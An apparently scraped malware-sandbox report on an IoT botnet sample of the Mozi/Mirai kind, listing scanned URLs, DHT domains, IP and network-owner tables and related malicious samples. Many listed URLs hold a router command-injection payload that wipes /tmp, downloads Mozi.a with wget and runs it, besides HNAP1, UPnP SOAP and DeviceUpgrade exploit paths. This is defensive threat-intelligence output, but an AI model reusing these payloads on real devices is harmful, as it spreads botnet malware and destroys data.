                            http://179.212.119.100:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://123.154.158.173:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://196.103.201.163:80/HNAP1/0%Avira URL Cloudsafe
                            http://142.190.2.119:80/HNAP1/0%Avira URL Cloudsafe
                            http://211.138.21.19:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://191.42.122.94:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://63.164.155.1:37215/ctrlt/DeviceUpgrade_10%Avira URL Cloudsafe
                            http://48.128.115.213:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://67.28.77.205:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://68.148.176.5:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://159.88.243.196:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://139.35.76.83:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            NameIPActiveMaliciousAntivirus DetectionReputation
                            dht.transmissionbt.com
                            212.129.33.59
                            truefalse
                              high
                              router.bittorrent.com
                              unknown
                              unknownfalse
                                high
                                bttracker.debian.org
                                unknown
                                unknownfalse
                                  high
                                  router.utorrent.com
                                  unknown
                                  unknownfalse
                                    high
                                    NameMaliciousAntivirus DetectionReputation
                                    http://210.2.75.78:80/HNAP1/false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://128.160.247.151:49152/soap.cgi?service=WANIPConn1true
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://186.63.148.222:80/HNAP1/false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://158.22.222.94:37215/ctrlt/DeviceUpgrade_1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://157.209.190.23:49152/soap.cgi?service=WANIPConn1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://155.6.109.17:80/HNAP1/false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://158.171.104.91:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawsfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://166.48.28.230:49152/soap.cgi?service=WANIPConn1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://157.246.210.71:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawsfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://58.208.230.98:80/HNAP1/false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://204.114.138.144:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawsfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://214.39.222.231:49152/soap.cgi?service=WANIPConn1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://82.182.64.86:80/HNAP1/false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://78.174.112.194:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawsfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://195.215.15.36:37215/ctrlt/DeviceUpgrade_1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://1.145.88.230:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawsfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://169.102.92.231:49152/soap.cgi?service=WANIPConn1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://84.108.181.121:37215/ctrlt/DeviceUpgrade_1true
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://8.59.167.66:80/HNAP1/false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://93.50.135.175:49152/soap.cgi?service=WANIPConn1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://75.128.231.129:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawsfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://57.86.125.106:80/HNAP1/false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://211.75.126.69:49152/soap.cgi?service=WANIPConn1true
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://165.42.160.13:80/HNAP1/false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://20.189.75.252:49152/soap.cgi?service=WANIPConn1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://90.217.106.121:80/HNAP1/false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://199.231.185.52:49152/soap.cgi?service=WANIPConn1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://84.48.173.191:49152/soap.cgi?service=WANIPConn1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://39.29.53.94:49152/soap.cgi?service=WANIPConn1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://182.155.232.129:37215/ctrlt/DeviceUpgrade_1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://82.247.4.104:80/HNAP1/false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://220.208.144.34:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawsfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://42.76.206.69:37215/ctrlt/DeviceUpgrade_1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://134.97.14.34:49152/soap.cgi?service=WANIPConn1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://62.13.179.175:80/HNAP1/false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://99.94.203.155:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawsfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://180.57.56.71:37215/ctrlt/DeviceUpgrade_1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://181.20.68.245:49152/soap.cgi?service=WANIPConn1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://74.58.189.101:49152/soap.cgi?service=WANIPConn1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://11.229.114.210:37215/ctrlt/DeviceUpgrade_1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://72.134.146.85:80/HNAP1/false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://73.77.168.19:80/HNAP1/false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://78.111.154.190:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawsfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://103.215.183.237:49152/soap.cgi?service=WANIPConn1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://106.126.135.113:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawsfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://49.18.1.208:80/HNAP1/false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://135.158.93.91:49152/soap.cgi?service=WANIPConn1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://151.201.119.114:37215/ctrlt/DeviceUpgrade_1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://22.249.87.53:80/HNAP1/false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://134.87.142.186:37215/ctrlt/DeviceUpgrade_1true
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://29.90.152.126:37215/ctrlt/DeviceUpgrade_1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://187.109.155.118:37215/ctrlt/DeviceUpgrade_1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://217.15.207.28:37215/ctrlt/DeviceUpgrade_1true
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://192.252.242.222:80/HNAP1/false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://176.67.30.177:49152/soap.cgi?service=WANIPConn1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://53.126.136.182:37215/ctrlt/DeviceUpgrade_1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://36.64.74.203:49152/soap.cgi?service=WANIPConn1true
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://202.178.119.161:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawstrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://186.220.42.0:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawsfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://163.197.220.203:49152/soap.cgi?service=WANIPConn1true
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://160.79.59.90:37215/ctrlt/DeviceUpgrade_1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://220.157.8.218:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawsfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://161.142.203.178:49152/soap.cgi?service=WANIPConn1true
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://220.213.171.152:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawstrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://121.41.156.213:49152/soap.cgi?service=WANIPConn1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://86.1.241.8:49152/soap.cgi?service=WANIPConn1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://110.177.183.23:37215/ctrlt/DeviceUpgrade_1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://211.52.34.202:80/HNAP1/false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://152.249.241.6:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawsfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://90.6.70.177:49152/soap.cgi?service=WANIPConn1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://99.219.59.203:49152/soap.cgi?service=WANIPConn1true
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://146.249.197.42:49152/soap.cgi?service=WANIPConn1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://117.201.100.204:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawsfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://39.167.82.235:80/HNAP1/false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://149.239.18.173:80/HNAP1/false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://4.222.236.14:80/HNAP1/false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://53.189.162.142:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawstrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://14.91.101.35:49152/soap.cgi?service=WANIPConn1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://204.181.118.146:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawsfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://155.65.230.109:37215/ctrlt/DeviceUpgrade_1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://125.200.222.101:49152/soap.cgi?service=WANIPConn1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://13.1.80.75:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawsfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://69.229.221.117:80/HNAP1/false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://139.39.140.82:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawsfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://177.200.207.58:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawstrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://207.148.48.191:37215/ctrlt/DeviceUpgrade_1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://179.212.119.100:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawsfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://123.154.158.173:49152/soap.cgi?service=WANIPConn1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://142.190.2.119:80/HNAP1/false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://196.103.201.163:80/HNAP1/false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://211.138.21.19:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawsfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://191.42.122.94:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawsfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://63.164.155.1:37215/ctrlt/DeviceUpgrade_1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://48.128.115.213:49152/soap.cgi?service=WANIPConn1true
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://67.28.77.205:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawsfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://68.148.176.5:49152/soap.cgi?service=WANIPConn1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://159.88.243.196:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawsfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://139.35.76.83:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawsfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    NameSourceMaliciousAntivirus DetectionReputation
                                    http://baidu.com/%s/%s/%d/%s/%s/%s/%s)bin.sh.elf, networks.34.drfalse
                                      high
                                      http://www.alsa-project.org.alsa-info.sh.34.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
                                      IPDomainCountryFlagASNASN NameMalicious
                                      157.139.78.181
                                      unknownUnited States
                                      20252JSIWMCUSfalse
                                      181.111.132.84
                                      unknownArgentina
                                      7303TelecomArgentinaSAARfalse
                                      66.173.67.223
                                      unknownUnited States
                                      4181TDS-ASUSfalse
                                      44.182.147.239
                                      unknownUnited States
                                      58247NETVEILLANCEROfalse
                                      97.137.140.224
                                      unknownUnited States
                                      6167CELLCO-PARTUSfalse
                                      186.179.189.32
                                      unknownSuriname
                                      27775TelecommunicationcompanySuriname-TeleSurSRfalse
                                      68.90.91.181
                                      unknownUnited States
                                      7018ATT-INTERNET4USfalse
                                      57.99.214.87
                                      unknownBelgium
                                      51964ORANGE-BUSINESS-SERVICES-IPSN-ASNFRfalse
                                      169.173.214.105
                                      unknownUnited States
                                      37611AfrihostZAfalse
                                      76.39.219.104
                                      unknownUnited States
                                      18494CENTURYLINK-LEGACY-EMBARQ-WRBGUSfalse
                                      162.231.86.136
                                      unknownUnited States
                                      7018ATT-INTERNET4USfalse
                                      106.66.11.161
                                      unknownIndia
                                      45271ICLNET-AS-APIdeaCellularLimitedINfalse
                                      66.253.240.90
                                      unknownUnited States
                                      46925PAVLOVMEDIA-SEUSfalse
                                      87.125.199.76
                                      unknownSpain
                                      12430VODAFONE_ESESfalse
                                      50.117.190.69
                                      unknownCanada
                                      53910NWST-SATCAfalse
                                      58.205.211.114
                                      unknownChina
                                      4538ERX-CERNET-BKBChinaEducationandResearchNetworkCenterfalse
                                      110.190.237.193
                                      unknownChina
                                      38283CHINANET-SCIDC-AS-APCHINANETSiChuanTelecomInternetDatafalse
                                      116.175.37.80
                                      unknownChina
                                      4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                                      14.0.97.178
                                      unknownKorea Republic of
                                      38107CDNETWORKS-AS-KRCDNetworksKRfalse
                                      146.120.127.194
                                      unknownCzech Republic
                                      197433TK-ORION-ASUAfalse
                                      179.120.163.226
                                      unknownBrazil
                                      26615TIMSABRfalse
                                      23.7.221.74
                                      unknownUnited States
                                      20940AKAMAI-ASN1EUfalse
                                      158.86.252.199
                                      unknownUnited States
                                      20379NET-BAKERUSfalse
                                      183.34.226.94
                                      unknownChina
                                      4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                                      45.133.82.239
                                      unknownUnited Kingdom
                                      1828UNITASUSfalse
                                      111.71.168.62
                                      unknownTaiwan; Republic of China (ROC)
                                      17421EMOME-NETMobileBusinessGroupTWfalse
                                      74.34.236.90
                                      unknownUnited States
                                      7011FRONTIER-AND-CITIZENSUSfalse
                                      174.8.113.81
                                      unknownUnited States
                                      6327SHAWCAfalse
                                      59.83.180.134
                                      unknownChina
                                      37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
                                      72.211.6.139
                                      unknownUnited States
                                      22773ASN-CXA-ALL-CCI-22773-RDCUSfalse
                                      154.187.3.120
                                      unknownEgypt
                                      8452TE-ASTE-ASEGfalse
                                      6.235.243.192
                                      unknownUnited States
                                      3356LEVEL3USfalse
                                      153.130.11.71
                                      unknownJapan4713OCNNTTCommunicationsCorporationJPfalse
                                      131.134.121.22
                                      unknownCanada
                                      74SSC-299-Z-74CAfalse
                                      115.122.131.6
                                      unknownChina
                                      4847CNIX-APChinaNetworksInter-ExchangeCNfalse
                                      216.186.136.8
                                      unknownUnited States
                                      12083WOW-INTERNETUSfalse
                                      171.79.99.1
                                      unknownIndia
                                      24560AIRTELBROADBAND-AS-APBhartiAirtelLtdTelemediaServicestrue
                                      102.97.7.108
                                      unknownMorocco
                                      36925ASMediMAfalse
                                      217.89.158.155
                                      unknownGermany
                                      3320DTAGInternetserviceprovideroperationsDEfalse
                                      39.170.191.118
                                      unknownChina
                                      56041CMNET-ZHEJIANG-APChinaMobilecommunicationscorporationCfalse
                                      218.9.165.42
                                      unknownChina
                                      4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                                      147.21.126.56
                                      unknownUnited States
                                      53418DIRECTV-LOSANGELESUSfalse
                                      87.122.11.33
                                      unknownGermany
                                      8881VERSATELDEfalse
                                      100.167.228.89
                                      unknownUnited States
                                      21928T-MOBILE-AS21928USfalse
                                      184.105.242.13
                                      unknownUnited States
                                      395100RVBA2016USfalse
                                      164.139.228.99
                                      unknownGermany
                                      8569MSYSDEfalse
                                      5.53.253.70
                                      unknownBulgaria
                                      13124IBGCBGfalse
                                      88.134.94.149
                                      unknownGermany
                                      31334KABELDEUTSCHLAND-ASDEfalse
                                      152.160.110.160
                                      unknownUnited States
                                      12129123NETUSfalse
                                      48.157.74.54
                                      unknownUnited States
                                      2686ATGS-MMD-ASUSfalse
                                      173.172.81.60
                                      unknownUnited States
                                      11427TWC-11427-TEXASUSfalse
                                      166.34.167.237
                                      unknownUnited States
                                      3372MCI-ASNUSfalse
                                      104.50.209.45
                                      unknownUnited States
                                      7018ATT-INTERNET4USfalse
                                      202.224.220.246
                                      unknownJapan2514INFOSPHERENTTPCCommunicationsIncJPfalse
                                      164.97.228.150
                                      unknownAustralia
                                      38470DIBP-AS-APDIBPAUfalse
                                      113.242.65.111
                                      unknownChina
                                      4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                                      104.253.241.8
                                      unknownUnited States
                                      18779EGIHOSTINGUSfalse
                                      167.222.231.15
                                      unknownReserved
                                      3598MICROSOFT-CORP-ASUSfalse
                                      207.228.233.232
                                      unknownUnited States
                                      14361HOPONE-GLOBALUSfalse
                                      46.137.14.222
                                      unknownIreland
                                      16509AMAZON-02USfalse
                                      93.75.145.101
                                      unknownUkraine
                                      25229VOLIA-ASUAfalse
                                      134.141.166.125
                                      unknownUnited States
                                      6363ENTERASYS-NETWORKSUSfalse
                                      161.243.163.247
                                      unknownUnited States
                                      36548ASCOJUSfalse
                                      142.129.210.84
                                      unknownUnited States
                                      20001TWC-20001-PACWESTUSfalse
                                      185.60.44.235
                                      unknownRussian Federation
                                      29124ISKRATELECOM-ASSEVEN-SKYRUfalse
                                      211.145.249.18
                                      unknownChina
                                      4808CHINA169-BJChinaUnicomBeijingProvinceNetworkCNfalse
                                      61.137.191.171
                                      unknownChina
                                      4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                                      88.98.103.252
                                      unknownSpain
                                      43160ES-MDC-DATACENTERMalagaDataCenterESfalse
                                      98.175.160.159
                                      unknownUnited States
                                      22773ASN-CXA-ALL-CCI-22773-RDCUSfalse
                                      89.23.71.30
                                      unknownSerbia
                                      52116ORIONTELEKOM-DPI-ASRSfalse
                                      77.222.109.164
                                      unknownRussian Federation
                                      8369INTERSVYAZ-AS38-BKomsomolskyprospektRUfalse
                                      65.198.253.101
                                      unknownUnited States
                                      701UUNETUSfalse
                                      13.111.101.150
                                      unknownUnited States
                                      22606EXACT-7USfalse
                                      38.10.165.171
                                      unknownUnited States
                                      174COGENT-174USfalse
                                      187.22.87.34
                                      unknownBrazil
                                      28573CLAROSABRfalse
                                      101.31.182.131
                                      unknownChina
                                      4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                                      97.199.39.93
                                      unknownUnited States
                                      6167CELLCO-PARTUSfalse
                                      43.7.231.155
                                      unknownJapan4249LILLY-ASUSfalse
                                      68.75.100.233
                                      unknownUnited States
                                      7018ATT-INTERNET4USfalse
                                      102.42.85.213
                                      unknownEgypt
                                      8452TE-ASTE-ASEGfalse
                                      218.158.128.23
                                      unknownKorea Republic of
                                      4766KIXS-AS-KRKoreaTelecomKRfalse
                                      1.49.139.39
                                      unknownChina
                                      4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                                      146.61.7.81
                                      unknownUnited States
                                      3209VODANETInternationalIP-BackboneofVodafoneDEfalse
                                      203.186.101.240
                                      unknownHong Kong
                                      9269HKBN-AS-APHongKongBroadbandNetworkLtdHKfalse
                                      195.144.8.59
                                      unknownUnited Kingdom
                                      47813SEMANTICOGBfalse
                                      61.170.255.194
                                      unknownChina
                                      4812CHINANET-SH-APChinaTelecomGroupCNfalse
                                      4.171.104.23
                                      unknownUnited States
                                      3356LEVEL3USfalse
                                      136.36.91.188
                                      unknownUnited States
                                      16591GOOGLE-FIBERUSfalse
                                      135.253.214.20
                                      unknownUnited States
                                      10455LUCENT-CIOUSfalse
                                      89.190.123.91
                                      unknownLithuania
                                      41228NNT-AS41228LTfalse
                                      171.236.227.155
                                      unknownViet Nam
                                      7552VIETEL-AS-APViettelGroupVNfalse
                                      176.144.34.60
                                      unknownFrance
                                      5410BOUYGTEL-ISPFRfalse
                                      171.236.227.152
                                      unknownViet Nam
                                      7552VIETEL-AS-APViettelGroupVNfalse
                                      103.42.164.12
                                      unknownunknown
                                      38742AWCC-AS-APAWCCAFfalse
                                      22.206.3.175
                                      unknownUnited States
                                      8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                      102.17.248.221
                                      unknownunknown
                                      37054Telecom-MalagasyMGfalse
                                      211.191.185.127
                                      unknownKorea Republic of
                                      4670HYUNDAI-KRShinbiroKRfalse
                                      196.6.17.233
                                      unknownSouth Africa
                                      36974AFNET-ASCIfalse
                                      173.69.79.11
                                      unknownUnited States
                                      701UUNETUSfalse
                                      219.70.169.220
                                      unknownTaiwan; Republic of China (ROC)
                                      9416MULTIMEDIA-AS-APHoshinMultimediaCenterIncTWfalse
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      157.139.78.181p4Sa8sk5fM.elfGet hashmaliciousMirai, MoobotBrowse
                                        66.173.67.223aPu2pUmHzL.elfGet hashmaliciousMiraiBrowse
                                          44.182.147.2396qTuRwkI5A.elfGet hashmaliciousUnknownBrowse
                                            146.120.127.194PRu3JHI5wzGet hashmaliciousMiraiBrowse
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              dht.transmissionbt.comna.elfGet hashmaliciousMiraiBrowse
                                              • 87.98.162.88
                                              SecuriteInfo.com.Trojan.Crypt.23519.13317.exeGet hashmaliciousUnknownBrowse
                                              • 212.129.33.59
                                              SecuriteInfo.com.Trojan.Crypt.23519.13317.exeGet hashmaliciousUnknownBrowse
                                              • 212.129.33.59
                                              SecuriteInfo.com.Riskware.OfferCore.5002.4698.exeGet hashmaliciousPrivateLoaderBrowse
                                              • 87.98.162.88
                                              5d9fe2735d4399d98e6e6a792b1feb26d6f2d9a5d77944ecacb4b4837e5e5fca.zipGet hashmaliciousXmrigBrowse
                                              • 87.98.162.88
                                              240506-b7lv1sfmcw_pw_infected.zipGet hashmaliciousXmrigBrowse
                                              • 87.98.162.88
                                              240506-b7lv1sfmcw_pw_infected.zipGet hashmaliciousXmrigBrowse
                                              • 87.98.162.88
                                              5d9fe2735d4399d98e6e6a792b1feb26d6f2d9a5d77944ecacb4b4837e5e5fca.zipGet hashmaliciousXmrigBrowse
                                              • 87.98.162.88
                                              na.elfGet hashmaliciousMiraiBrowse
                                              • 87.98.162.88
                                              Photo.scr.exeGet hashmaliciousXmrigBrowse
                                              • 87.98.162.88
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              JSIWMCUSdebug.dbg.elfGet hashmaliciousMirai, MoobotBrowse
                                              • 157.139.31.165
                                              x86_64.elfGet hashmaliciousMirai, MoobotBrowse
                                              • 157.139.31.109
                                              la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                              • 140.251.34.90
                                              o2YUBeMZW6.elfGet hashmaliciousMiraiBrowse
                                              • 157.139.31.161
                                              la.bot.powerpc.elfGet hashmaliciousMiraiBrowse
                                              • 140.251.46.19
                                              arm7.elfGet hashmaliciousUnknownBrowse
                                              • 140.251.34.87
                                              h3G4uG7Kqi.elfGet hashmaliciousMiraiBrowse
                                              • 157.139.31.174
                                              mpsl.elfGet hashmaliciousMirai, MoobotBrowse
                                              • 157.139.187.6
                                              bnrKk80Fa9.elfGet hashmaliciousMiraiBrowse
                                              • 157.139.31.158
                                              dNBHFhYkoO.elfGet hashmaliciousMirai, OkiruBrowse
                                              • 157.139.250.3
                                              TDS-ASUSarm.elfGet hashmaliciousMiraiBrowse
                                              • 69.128.86.143
                                              mpsl.elfGet hashmaliciousMiraiBrowse
                                              • 69.131.158.99
                                              .pjyhwsdgkl.elfGet hashmaliciousUnknownBrowse
                                              • 184.60.188.74
                                              x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                              • 69.131.173.173
                                              splm68k.elfGet hashmaliciousUnknownBrowse
                                              • 69.11.194.75
                                              la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                              • 139.135.176.204
                                              botx.m68k.elfGet hashmaliciousMiraiBrowse
                                              • 69.128.130.253
                                              botx.x86.elfGet hashmaliciousMiraiBrowse
                                              • 24.75.192.92
                                              m68k.elfGet hashmaliciousMirai, GafgytBrowse
                                              • 69.131.183.25
                                              ppc.elfGet hashmaliciousMiraiBrowse
                                              • 184.61.110.116
                                              TelecomArgentinaSAARmpsl.elfGet hashmaliciousMiraiBrowse
                                              • 181.30.220.7
                                              sparc.elfGet hashmaliciousOkiruBrowse
                                              • 181.9.213.110
                                              mpsl.elfGet hashmaliciousMiraiBrowse
                                              • 190.224.109.108
                                              .pjyhwsdgkl.elfGet hashmaliciousUnknownBrowse
                                              • 181.110.46.191
                                              jmggnxeedy.elfGet hashmaliciousUnknownBrowse
                                              • 181.166.245.156
                                              pbnpvwfhco.elfGet hashmaliciousUnknownBrowse
                                              • 186.127.121.223
